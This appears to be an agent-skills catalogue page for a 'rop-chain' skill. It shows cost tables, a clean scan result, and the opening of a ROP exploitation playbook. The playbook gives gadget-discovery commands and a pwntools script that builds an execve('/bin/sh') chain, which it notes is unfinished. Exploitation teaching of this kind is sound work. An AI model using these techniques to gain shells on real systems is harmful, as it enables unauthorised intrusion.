Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx skills add MingyiSecLab/Mingyi-Atlas --skill rop-chaingit clone --depth 1 https://github.com/MingyiSecLab/Mingyi-AtlasWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/rop-chain)<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/rop-chain"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/rop-chain/github.svg" alt="Measured on agentmods" height="20"></a>Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.
<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/rop-chain"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/rop-chain.svg" alt="Reviewed on agentmods" width="80" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00027 | $0.02115 |
| Opus 5 | $0.00014 | $0.01058 |
| Sonnet 5 | $0.00005 | $0.00423 |
| Haiku 4.5 | $0.00003 | $0.00212 |
Grade A, and why
rop-chain scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 9d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Nothing flagged
None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.
How it starts
The opening of the file, as written. The whole thing — 211 lines — stays where its author put it; the contents beside it link to each section on GitHub.
ROP Chain Construction Playbook
ROP (Return-Oriented Programming) and JOP (Jump-Oriented) repurpose
existing code fragments ("gadgets") ending in ret / jmp <reg> to
build arbitrary computation without injecting code. Required when NX/DEP
prevents shellcode execution.
1. Inventory mitigations
Before building the chain, know what protections you face:
checksec --file=/tmp/binary
# Or
pwn checksec /tmp/binary
Output flags:
- NX: stack non-executable → ROP needed
- PIE: position-independent → need leak first
- RELRO (partial/full): GOT writable / read-only
- Canary: stack-cookie → leak/bypass needed
- ASLR: addresses randomized → leak needed for libc/PIE
2. Gadget discovery
# ROPgadget (most common)
ROPgadget --binary /tmp/binary --depth 8 > /tmp/gadgets.txt
# Filter useful ones
grep ': pop rdi ; ret$' /tmp/gadgets.txt # syscall arg1 setup
grep ': pop rsi ; ret$' /tmp/gadgets.txt # syscall arg2 setup
grep ': pop rdx ; ret$' /tmp/gadgets.txt # arg3
grep ': syscall ; ret$' /tmp/gadgets.txt # syscall instruction
grep ': ret$' /tmp/gadgets.txt | head # bare ret (stack alignment)
# Alternative: ropper
ropper --file /tmp/binary --search 'pop rdi'
ropper --file /tmp/binary --search 'syscall'
# Alternative: one_gadget for libc one-shot RCE
one_gadget /lib/x86_64-linux-gnu/libc.so.6
3. Common chain patterns
Direct execve("/bin/sh") via syscall (x86_64)
from pwn import *
# Gadgets from /tmp/binary
POP_RDI = 0x4011a3 # pop rdi ; ret
POP_RSI = 0x4011a1 # pop rsi ; ret
POP_RDX = 0x4011a5 # pop rdx ; ret
POP_RAX = 0x4011a7 # pop rax ; ret
SYSCALL = 0x4011a9 # syscall ; ret
# Target
BIN_SH = 0x404060 # writeable .bss for "/bin/sh\x00"
chain = b''
# write "/bin/sh\0" to BIN_SH
chain += p64(POP_RAX) + p64(0x68732f6e69622f) # /bin/sh in little-endian, no null at end
chain += p64(POP_RDI) + p64(BIN_SH)
# stos or mov [rdi], rax — need gadget
# (this needs more gadgets, see "write-what-where" section below)
# execve(BIN_SH, NULL, NULL)
chain += p64(POP_RAX) + p64(0x3b) # SYS_execve = 59
chain += p64(POP_RDI) + p64(BIN_SH)
chain += p64(POP_RSI) + p64(0)
chain += p64(POP_RDX) + p64(0)
chain += p64(SYSCALL)
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 9d ago First seen · 211 lines · 27 tokens per session scan A db36ce168efe
rop-chain is a skill published in the GitHub repository MingyiSecLab/Mingyi-Atlas (11 stars, last pushed 2mo ago), licensed Apache-2.0. It adds 27 tokens to every session and 2,115 once invoked, about $0.0001 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-09-03.
Other skills, from other repositories
cis-aws-foundations-6.5
Ensure the default security group of every VPC restricts all traffic.
cis-aws-foundations-4.3
Ensure AWS Config is enabled in all regions.
cis-aws-foundations-2.1.3
Ensure Organizations management account is not used for workloads.
cis-aws-foundations-2.5
Ensure MFA is enabled for the 'root' user account.
cis-aws-foundations-2.7
Eliminate use of the 'root' user for administrative and daily tasks.
cis-aws-foundations-4.4
Ensure that server access logging is enabled on the CloudTrail S3 bucket.